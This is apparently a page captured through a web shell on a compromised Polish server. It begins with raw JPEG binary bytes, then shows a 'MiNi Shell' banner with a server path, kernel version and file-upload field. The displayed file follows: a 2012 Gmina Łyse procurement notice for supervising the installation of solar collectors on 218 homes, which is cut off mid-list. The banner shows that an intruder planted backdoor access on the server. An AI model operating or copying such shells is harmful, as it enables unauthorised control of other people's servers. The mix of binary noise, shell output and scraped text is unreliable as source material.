JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120911/342216-N-2012.html

<p class="kh_header"><b>Łyse: Pełnienie funkcji inspektora nadzoru inwestorskiego 
dla zadania pod nazwą 
Wykorzystanie odnawialnych źródeł energii na Kurpiowszczyźnie 
poprzez kompleksowy montaż kolektorów słonecznych w gminie Łyse</b><br>
<b>Numer ogłoszenia: 342216 - 2012; data zamieszczenia: 11.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łyse , ul. Ostrołęcka 2, 07-437 Łyse, woj. mazowieckie, tel. 29 7725027 wew.44, faks 29 7725003 w. 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminalyse.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego 
dla zadania pod nazwą 
Wykorzystanie odnawialnych źródeł energii na Kurpiowszczyźnie 
poprzez kompleksowy montaż kolektorów słonecznych w gminie Łyse.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Pełnienie funkcji Inspektora Nadzoru Inwestorskiego dla zadania pod nazwą Wykorzystanie odnawialnych źródeł energii na Kurpiowszczyźnie 
poprzez kompleksowy montaż kolektorów słonecznych w gminie Łyse

Kod i nazwa zamówienia według Wspólnego Słownika Zamówień (CPV): 

71520000-9 - usługi nadzoru budowlanego. 

      Zakres obowiązków Wykonawcy- Inspektora Nadzoru Inwestorskiego
 
1.	    reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem, przepisami oraz zasadami wiedzy technicznej poprzez : 
1)	Przekazanie Wykonawcy w imieniu Zamawiającego  terenu budowy, reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności realizacji inwestycji z projektami , specyfikacją techniczną wykonania i odbioru robót, przedmiarem robót oraz aktualnie dostępną wiedzą techniczną, sztuką budowlaną, prawem obowiązującym w tym zakresie, a w szczególności Prawem budowlanym, Polskimi i Europejskimi Normami.
2)	Kontrola prawidłowości prowadzenia wewnętrznych dzienników budowy i dokonywanie w nich wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego.
3)	Koordynacja robót poszczególnych branż
4)	Kontrolowania przestrzegania przez Wykonawcę Robót, dostaw, zasad bezpieczeństwa pracy              i utrzymania porządku na terenie budowy , p.poż. i ochrony środowiska.
5)	Kontrola zgodności wykonania robót z umową  zawartą z Wykonawcą Robót
6)	Wykonawca musi  nadzorować budowę (roboty budowlane) w takich odstępach czasu aby zapewniona była skuteczność nadzoru, w tym prowadzenia regularnych inspekcji na terenie budowy każdej z 218 instalacji solarnych na budynkach mieszkalnych na terenie Gminy Łyse, przynajmniej dwa razy w obrębie każdej nieruchomości w celu sprawdzenia jakości wykonywanych robót oraz wbudowywanych materiałów, zgodnie z wymaganiami specyfikacji technicznych wykonania i odbioru robót, dokumentacji projektowej oraz praktyką inżynierską, sztuką budowlaną, umową zawartą pomiędzy Zamawiającym a Wykonawcą Robót. Każda inspekcja winna być udokumentowana w formie pisemnej przez Inspektora wraz z określeniem zakresu inspekcji, daty jej wykonania, celu oraz czytelnym podpisem właściciela nieruchomości poświadczającej  jej odbycie. Dokumenty dołącza się do protokołu odbioru.  
7)	Nadzorowanie i pisemne informowanie Zamawiającego o zabezpieczeniach stosowanych na terenie budowy, przeciwdziałanie nieprawidłowościom mogącym spowodować zagrożenia dla osób przebywających na terenie, na którym realizowane będą prace budowlane
8)	Wstrzymanie robót prowadzonych w sposób zagrażający bezpieczeństwu lub niezgodnie z wymaganiami umowy zawartej pomiędzy Zamawiającym  a  Wykonawcą  Robót i niezwłocznego pisemnego powiadomienia Zamawiającego o tym fakcie
9)	Wnioskowania o usunięcie z terenu budowy każdej osoby zatrudnionej przez Wykonawcę Robót, która zachowuje się niewłaściwie lub jest niekompetentna lub niedbała w swojej pracy, znajduje się w stanie wskazującym na spożycie alkoholu lub innego środka odurzającego, nie używa wymaganych zabezpieczeń przewidzianych przepisami BHP 
10)	Pisemne informowanie Zamawiającego o konieczności wykonania robót odbiegających od założeń projektowych w terminie 3 dni od daty stwierdzenia konieczności ich wykonania wraz z propozycją rozwiązań.
11)	Pisemne informowanie Zamawiającego o problemach i możliwych nieprawidłowościach mogących powstać w wyniku realizacji przedmiotu umowy wraz z propozycją rozwiązań.
12)	Udzielania Wykonawcy Robót wszelkich dostępnych informacji i wyjaśnień dotyczących umowy  na roboty budowlane
13)	Sprawdzenie czy roboty w obrębie nieruchomości wykonują osoby wskazane w ofercie wykonawcy robót budowlanych.
14)	Zgłaszania Zamawiającemu przypadków w których rozwiązania projektowe odbiegają od przyjętych rozwiązań stosowanych w praktyce w wyniku których może dojąć do pogorszenia uzyskania efektu ekologicznego i rzeczowego wraz z przedstawieniem propozycji rozstrzygnięcia (np. osobny montaż instalacji złożonej z dwóch kolektorów słonecznych w różnych częściach dachu, montaż instalacji na dachu powodującej nadmierne wałowanie śniegu itp.) Analiza przypadków winna być prowadzona przez inspektora nadzoru już na podstawie ustaleń wynikających z projektów przed rozpoczęciem robót.
15)	Sprawdzanie czy Wykonawca Robót przeprowadził optymalizację zaproponowanych systemów solarnych jeżeli to było konieczne
2.	sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie poprzez: 
1.	sprawdzanie czy  wykonano instalacje  przy użyciu materiałów  i urządzeń  wymienionych  w dokumentacji projektowej, SIWZ, ofercie Wykonawcy robót.
2.	Sprawdzanie jakości wykonywanych robót, wbudowanych materiałów budowlanych,                              a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i nie dopuszczonych do obrotu i stosowania w budownictwie (wyłącznie posiadające stosowne aprobaty, certyfikaty i atesty) czy zamiennych nie objętych dokumentami Zamawiającego,
3.	współdziałanie z Wykonawcą Robót i Zamawiającym w celu uzyskania najwyższych efektów w zakresie wykonywanych postanowień umowy z Wykonawcą Robót   w tym jakości wykonanych prac  i zamontowanych urządzeń 
4.	sprawdzanie ilości i jakości robót w trakcie ich wykonywania i po ich wykonaniu, wbudowywanych materiałów i wyrobów, a w szczególności zapobieganie stosowaniu materiałów i wyrobów wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie
5.	sprawdzanie czy zmontowano wszystkie urządzenia wymienione w dokumentacji projektowej 
6.	sprawdzanie czy zakres prac jest zgodny z założeniami projektowymi 
7.	sprawdzanie czy wykonana instalacja wykorzystywana będzie jedynie do potrzeb gospodarstwa domowego
8.	nadzorowanie jakości i prawidłowości usunięcia wad i usterek przez Wykonawcę Robót oraz dokonanie sprawdzenia ich usunięcia,
9.	 pobieranie prób materiałów, urządzeń do badań weryfikujących  ich jakość na zlecenie Zamawiającego. Próby odbierane przez Inwestora z ternu nieruchomości objętej zleceniem 
10.	zlecenie Wykonawcy robót wykonania dodatkowych badań materiałów lub robót budzących wątpliwości co do ich jakości
11.	zlecenie  dokonania przez Wykonawcę Robót, na jego koszt, odkrywek elementów robot budzących wątpliwości w celu sprawdzenia jakości ich wykonania, jeżeli wykonanie tych robót nie zostało zgłoszone do sprawdzenia przed ich zakryciem
12.	Uczestniczenie przy przeprowadzeniu  prób, pomiarów i sprawdzeń
13.	Podejmowanie w toku budowy wspólnie z Zamawiającym decyzji dotyczących  zagadnień technicznych, ekonomicznych i użytkowych tej budowy 
3.	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji i urządzeń technicznych oraz przygotowanie i udział  w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania poprzez: 
1.	dokonywanie przy udziale Zamawiającego odbioru  robót budowlanych (częściowych i końcowych), w tym podlegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji i urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru
2.	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji i urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania,
3.	przygotowanie i wypełnienie protokołu odbioru  zgodnego z wzorem dostarczonym przez Zamawiającego. 
4.	sprawdzanie kompletności dokumentów przedłożonych przez Wykonawcę Robót do odbiorów częściowych, odbioru końcowego.
4.	potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także, na żądanie Zamawiającego, kontrolowanie rozliczeń budowy poprzez: 
1.	Prowadzenie nadzoru nad prawidłowym przebiegiem robót zgodnie z umową oraz harmonogramem rzeczowo finansowym z Wykonawcą Robót, dokonanie analizy i zatwierdzanie harmonogramów rzeczowo-finansowych;
2.	potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, usterek
3.	kontrola usunięcia przez wykonawcę stwierdzonych wad; uczestniczenie w przejęciu przez Zamawiającego od wykonawcy usuniętych wad - potwierdzonych protokołem
4.	odpowiednio wyprzedzającego informowania Zamawiającego o wszelkich zagrożeniach występujących podczas realizacji robót, które mogą mieć wpływ na wydłużenie czasu wykonania, pogorszenie jakości robót, lub zwiększenie kosztów, oraz podejmowanych działaniach zapobiegawczych i naprawczych
5.	przeprowadzenie rozliczenia wykonanych i odebranych robót, zgodnie z umową z Wykonawcą Robót, a w szczególności: czynności kontrolne i weryfikacja faktur
6.	informowanie pisemnie w okresach 2 tygodniowych Zamawiającego o postępie robót, uzyskiwanym poziomie jakości robót, postępie finansowym oraz występujących problemach a także o gromadzenie niezbędnej dokumentacji odbiorowej oraz dokumentacji powykonawczej
7.	przedstawienie Zamawiającemu propozycji rozstrzygnięcia wątpliwości natury technicznej, jakości wykonanych  robót powstałych w toku prowadzonych prac jak i po ich zakończeniu (w tym także zgłaszanych przez właścicieli nieruchomości)  a w razie potrzeby zaciąganie opinii autora projektu, z wyjątkiem spraw mających wpływ na zmianę kosztów budowy,
8.	potwierdzanie faktycznie wykonanego zakresu robót jako podstawy do fakturowania  zgodnie z postanowieniami umowy zawartej pomiędzy Zleceniodawcą i Wykonawcą Robót
9.	udział w spotkaniach organizowanych przez Zleceniodawcę w sprawach dotyczących realizacji przedmiotowej budowy,
10.	Uczestnictwa w comiesięcznych  (a w przypadku wystąpienia takiej potrzeby - częściej) naradach  dotyczącym postępu robót, w których udział biorą przedstawiciele wszystkich zaangażowanych w realizację zadania inwestycyjnego stron, celu podejmowania bieżących decyzji, dotyczących wszystkich zagadnień mających wpływ na postęp robót, oraz sporządzenia protokołów z tych narad i przekazywania ich Zamawiającemu w terminie 5 dni roboczych od dnia narady
11.	poświadczenia terminu zakończenia robót
12.	doradzania Zamawiającemu  w zakresie roszczeń i sporów z Wykonawcą Robót oraz w zakresie problemów mogących się pojawić podczas prowadzenia robót budowlanych, a także, jeśli to możliwe, zapobiegania roszczeniom i opóźnieniom
13.	powiadomienia Zamawiającego  o wszelkich roszczeniach Wykonawcy Robót oraz rozbieżnościach między dokumentacją Zamawiającego a stanem faktycznym na terenie budowy wraz z przedstawieniem ich kalkulacji
14.	sprawdzenia ostatecznej kwoty należnej Wykonawcy Robót
15.	zweryfikowania i zatwierdzenia kompletnej dokumentacji powykonawczej, a następnie dostarczenia jej do Zamawiającego wraz z dokumentacją związaną z nadzorowaną budową w formie ustalonej z Zamawiającym
16.	wydania polecenia przyspieszenia lub opóźnienia tempa robót - po uprzednim uzyskaniu zgody Zamawiającego 
17.	opiniowania i wskazywania, nadzorowania  sposobu załatwienia wszelkiego rodzaju skarg i roszczeń osób trzecich wywołanych realizacją umowy zawartej pomiędzy Zamawiającym  a  Wykonawcą  Robót, w uzgodnieniu  z Inwestorem w tym w związku  z ewentualnymi skargami  właścicieli budynków mieszkalnych objętych robotami  
18.	regularnego przekazywania Zamawiającemu wszelkiej korespondencji związanej z wykonywaniem przedmiotu umowy i robót budowlanych
19.	dokonywania w odpowiednich terminach i formach, o ile tego wymagają stosowne przepisy lub postanowienia umowne wynikające z zawartych umów przez Zamawiającego, a dotyczących realizowanego zadania inwestycyjnego, rozliczeń częściowych lub okresowych, sprawozdawczości, monitoringu, ewaluacji przedmiotu kontraktu
20.	W przypadku kontroli realizacji zadania inwestycyjnego przez uprawnione organy Nadzór Inwestorski zobowiązany jest do natychmiastowego przedłożenia dokumentacji i stosownych rozliczeń do stanu faktycznego zaawansowania realizacji inwestycji
21.	Zgłaszanie Zamawiającemu stwierdzonych nieprawidłowości i wad w wykonywanych obiektach oraz proponowanie sposobu ich usunięcia
22.	sprawdzanie i opiniowanie wniosków Wykonawcy Robót,  w sprawie zmiany sposobu wykonania robót w stosunku do dokumentacji projektowej (roboty zamienne) oraz w sprawie robót uzupełniających , a także ustalenia sposobu wykonania tych robót 
23.	opiniowanie wniosków właścicieli budynków mieszkalnych w sprawie  zmiany zakresu prowadzonych robót, zmiany położenia elementów instalacji  wraz z określeniem propozycji rozstrzygnięcia  oraz zakresem zmiany kosztów 
24.	określenie zakresu urządzeń, robót  i zwianych z tym  kosztów  które nie zostały wykorzystane, wykonane w obrębie budynku mieszkalnego  
25.	opracowywanie opinii dotyczących wad i usterek przedmiotu niniejszej umowy wraz z proponowanym terminem ich usunięcia oraz wnioskowanie obniżenia wynagrodzenia za wady i usterki uznane jako nie nadające się do usunięcia
26.	kontrolowanie usunięcia przez Wykonawcę  Robót wad i usterek stwierdzonych w czasie budowy i przy odbiorze robót oraz powiadamianie Zleceniodawcę o usunięciu wad i usterek
27.	nadzorowanie kompletności i poprawności sporządzenia przez kierownika budowy dokumentacji powykonawczej
28.	w przypadku nieterminowego usuwania przez Wykonawcę Robót wad i usterek, przygotowanie Zamawiającemu danych, niezbędnych do naliczania kar umownych z tego tytułu
29.	potwierdzanie faktycznie wykonanego zakresu robót jako podstawy do fakturowania częściowego zgodnie z postanowieniami umowy zawartej pomiędzy Zleceniodawcą i Wykonawcą Robót
30.	przygotowanie oraz przedłożenie Zamawiającemu, w terminie 7 dni od daty podpisania protokołu końcowego budowy, sprawozdania końcowego z realizacji inwestycji
31.	przedstawiania Zamawiającemu pisemnych zaleceń na temat wyceny stawek wszelkich nieprzewidzianych robót
32.	sprawdzenia wykonanych robót i powiadamiania Wykonawcy Robót o wykrytych wadach oraz określania zakresu koniecznych do wykonania robót poprawkowych
33.	sprawdzania zestawień ilości i wartości wykonanych robót i sprawdzania protokołów odbioru częściowego wykonanych robót
34.	identyfikowania wszędzie tam gdzie jest to możliwe ryzyk powstania potencjalnych roszczeń ze strony Wykonawcy Robót i stron trzecich i informowania o tym Zamawiającego z propozycjami sposobów zapobiegania tym roszczeniom
35.	powiadamiania Zamawiającego o wszelkich roszczeniach Wykonawcy Robót oraz rozbieżnościach między dokumentacją Zamawiającego a stanem faktycznym na terenie budowy wraz z przedstawieniem sposobu załatwienia sprawy 
36.	rozpatrywanie  roszczeń Wykonawcy Robót i przedstawienia stanowiska w odniesieniu do nich
37.	w przypadku, gdy wszczęty zostanie spór sądowy między Zamawiającym a Wykonawca Robót dotyczący realizacji inwestycji, wsparcie Zamawiającego poprzez przedstawienie wyczerpujących informacji i wyjaśnień dotyczących sporu oraz jednoznacznego stanowiska Wykonawcy Robót co do przedmiotu sporu
38.	opiniowanie możliwości technicznych zmian w projektach wnioskowanych przez właścicieli budynków
39.	opiniowanie możliwości technicznych i finansowych włączenia budynków mieszkalnych z listy rezerwowej do realizacji projektu w miejsce osób rezygnujących..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp, zgodnie z warunkami określonymi w ustawie.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w przedmiotowym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu - wzór zał. nr 3 do SIWZ (oryginał) Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców wg formuły: spełnia/nie spełnia na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), wykonał należycie usługi polegające na nadzorze inwestorskim lub zaprojektowaniu robót polegających na montażu instalacji kolektorów słonecznych wspomagających wytwarzanie ciepłej wody użytkowej na co najmniej  stu pięćdziesięciu budynkach. Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców wg formuły: spełnia/nie spełnia na podstawie wykazu usług  - wzór załącznik nr 6 do SIWZ, z załączeniem dokumentu potwierdzającego, że usługi nadzoru zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu - wzór zał. nr 3 do SIWZ (oryginał) Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców wg formuły: spełnia/nie spełnia na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli wykonawca dysponuje lub będzie dysponował osobami posiadającymi uprawnienia do kierowania i nadzorowania robotami budowlanymi bez ograniczeń w branży konstrukcyjno-budowlanej, sanitarnej oraz elektrycznej posiadającymi co najmniej dwuletnie doświadczenie w pełnieniu funkcji inspektora nadzoru, kierownika budowy lub kierownika robót 
Osoby, o których mowa powyżej powinny posiadać uprawnienia budowlane w odpowiednich specjalnościach do kierowania i nadzorowania robotami budowlanymi - zgodnie z wymogami określonymi przepisami prawa kraju, w którym osoba uzyskała właściwe uprawnienia, oraz być członkami właściwej izby samorządu zawodowego lub innej organizacji, o ile przepisy prawa kraju, w którym osoba uzyskała właściwe uprawnienia, wymagają członkostwa w izbie samorządu zawodowego lub innej organizacji do wykonywania zawodu regulowanego.  Osobami / kandydatami na stanowiska wymienione powyżej mogą być obywatele państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub Państw Członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - Europejskiego Obszaru Gospodarczego, którym - zgodnie przepisami dyrektywy 2005/36/WE Parlamentu Europejskiego i Rady z dnia 7.9.2005 r. w sprawie uznawania kwalifikacji zawodowych - uznano kwalifikacje zawodowe lub uznaje się kwalifikacje przez właściwe organy w Polsce. Osobami takimi mogą być również osoby spełniające warunki określone w art. 20a ustawy o samorządach zawodowych architektów, inżynierów i urbanistów. 
W przypadku Wykonawców posiadających siedzibę poza granicami RP, Zamawiający dopuszcza przedstawienie osób posiadających równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12 a Ustawy z dnia 7 lipca 1994 r. Prawo Budowlane, z uwzględnieniem postanowień Ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców wg formuły: spełnia/nie spełnia na podstawie oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia budowlane - wzór załącznik nr 9 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli wykaże, że posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100 000 zł. Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców wg formuły: spełnia/nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

